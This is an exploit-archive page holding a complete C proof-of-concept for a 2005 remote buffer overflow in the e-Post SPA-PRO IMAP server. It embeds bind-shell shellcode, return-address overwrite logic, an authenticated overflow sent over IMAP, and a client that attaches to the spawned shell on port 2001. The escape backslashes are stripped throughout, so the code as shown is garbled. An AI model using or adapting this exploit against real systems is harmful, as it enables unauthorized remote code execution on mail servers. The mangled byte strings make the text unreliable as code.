[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit
# Published : 2005-06-02
# Author : Jerome Athias
# Previous Title : Crob FTP Server <= 3.6.1 Remote Stack Overflow Exploit
# Next Title : Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:mailinbox%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")
unsigned char expBuf[] =
"2 create ""
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x55x8BxECx33xC9x66xB9xE8x03x2BxE1x32xC0x8BxFCxF3"
"xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8Bx70x08"
"xD9xEExD9x74x24xF4x5Fx83xC7x0CxEBx53x60x8Bx6Cx24"
"x24x8Bx75x3Cx8Bx74x35x78x03xF5x8Bx7Ex20x03xFDx8B"
"x4Ex18x56x33xDBx8Bx37x03xF5x33xC0x99xACx85xC0x74"
"x07xC1xCAx0Dx03xD0xEBxF4x3Bx54x24x2Cx74x09x83xC7"
"x04x43xE2xE1x5ExEBx16x5Ex8Bx7Ex24x03xFDx66x8Bx04"
"x5Fx8Bx7Ex1Cx03xFDx8Bx04x87x01x44x24x24x61xC3x89"
"x75xF4x68x8Ex4Ex0ExECx56xFFxD7x59x33xC0x66xB8x6C"
"x6Cx50x68x33x32x2Ex64x68x77x73x32x5Fx54xFFxD1x8B"
"xF0x68xD9x09xF5xADx56xFFxD7x5Bx83xC4x20x6Ax01x6A"
"x02xFFxD3x89x45xD0x68xA4x1Ax70xC7x56xFFxD7x5Bx33"
"xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50x8BxC4x6Ax10x50"
"xFFx75xD0xFFxD3x68xA4xADx2ExE9x56xFFxD7x5BxFFx75"
"xD0xFFxD3x8BxCCx6Ax10x8BxDCx68x35x54x8AxA1x56xFF"
"xD7x5Ax50x50x53x51xFFx75xD0xFFxD2x8BxD0x68xE7x79"
"xC6x79x56xFFxD7x58x89x45xF0x8Bx75xF4x83xC4x20xC6"
"x04x24x44xC6x44x24x2Dx01x89x54x24x38x89x54x24x3C"
"x89x54x24x40x8BxC4x8Dx58x44x68x72xFExB3x16x56xFF"
"xD7x5AxB9xFFx63x6Dx64xC1xE9x08x51x8BxCCx53x53x50"
"x33xC0x50x50x50x6Ax01x50x50x51x50xFFxD2x5Bx68xAD"
"xD9x05xCEx56xFFxD7x58x6AxFFxFFx33xFFxD0xFFx74x24"
"x48xFFx55xF0xFFx75xD0xFFx55xF0x68xEFxCExE0x60x56"
"xFFxD7x58xFFxD0x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"xe9x4fxfexffxffx41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x54x54x54x54"
"x55x55x55x55x56x56x56x56x57x57x57x57xE9x0CxFExFF"
"xFFxCCxEBxa0x5AxD6x19xF8x74x41x41x41x42x42x42x42"
"x43x43x43x43x44x44x44x44x45x45x45x45x46x46x46x46"
"x47x47x47x47x48x48x48x48x36x49x49x49x4Ax4Ax4Ax4A"
"x4Bx4Bx4Bx4Bx4Cx4Cx4Cx4Cx4Dx4Dx4Dx4Dx4Ex4Ex4Ex4E"
"x4Fx4Fx4Fx4Fx50x50x50x50x51x51x51x51x52x52x52x52"
"x53x53x53x53x54x54x54x54x55x55x55x55x56x56x56x56"
"x57x57x57x57x58x58x58x58x59x59x59x59x5Ax5Ax5Ax5A"
""rn";
void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);
for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;
if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
{
printf("select errorn");
break;
}
if(FD_ISSET(sockfd, &rset))
{
int n;
ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOFn");
return;
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}
#define ADDR_POSITION 534
#define RET_ADDR 0x74F819D6 // CALL EBX in Japanese Win2K SP4
// First short jump backwards. (EB AO)
// You should know what to change here, landing onto INT 3 to let debugger kick in.
#define FIRST_BACKJMP_INST 0x5AA0EBCC
int main(int argc, char* argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sin;
int err;
char inBuffer[10000];
char loginBuf[1000];
if(argc != 4)
{
printf("nUsage: %s <imap username> <imap password> <ip addr>n", argv[0]);
return 1;
}
if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
{
printf("nInvalid IMAP username! Maximum username length is 20.n");
return 1;
}
if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
{
printf("nInvalid IMAP password! Maximum password length is 14.n");
return 1;
}
memset(loginBuf, 0, sizeof(loginBuf));
_snprintf(loginBuf, sizeof(loginBuf), "1 login "%s" "%s"rn", argv[1], argv[2]);
loginBuf[sizeof(loginBuf)-1] = 0;
int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);
*((DWORD *)&expBuf[retPos]) = RET_ADDR;
*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;
wVersionRequested = MAKEWORD(2,0);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0)
{
printf("nWSAStartup Error.n");
return 1;
}
if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
{
printf("nWinsock Version Errorn");
WSACleanup();
return 1;
}
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
sin.sin_addr.s_addr = inet_addr(argv[3]);
sin.sin_family = AF_INET;
sin.sin_port = htons(143);
printf("n[+] Trying to connect to %sn", inet_ntoa(sin.sin_addr));
if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
{
int size;
// read IMAP banner
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("[-] Error receiving IMAP banner!n");
return 1;
}
printf("[+] IMAP banner received!nn");
fwrite(inBuffer, 1, size, stdout);
printf("n");
if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)
{
printf("[-] Error sending login!n");
return 1;
}
printf("[+] Login Sent.n");
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("[-] Error receiving login reply!n");
return 1;
}
if(strstr(inBuffer, "OK"))
printf("[+] Login successful!n");
else
{
printf("[+] Login failed!n");
return 1;
}
if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
{
printf("[-] Error sending exploit!n");
return 1;
}
else
{
printf("[+] Exploit sent!n");
}
Sleep(2000);
//================================= Connect to the target ==============================
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
{
printf("Invalid socket return in socket() call.n");
WSACleanup();
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[3]);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("Exploit Failed. SOCKET_ERROR return in connect call.n");
closesocket(sock);
WSACleanup();
return -1;
}
printf("[+] Exploit successful!nn");
shell(sock);
closesocket(sock);
}
else
{
printf("[-] Cannot connect!n");
}
closesocket(s);
WSACleanup();
return 0;
}
// www.Syue.com [2005-06-02]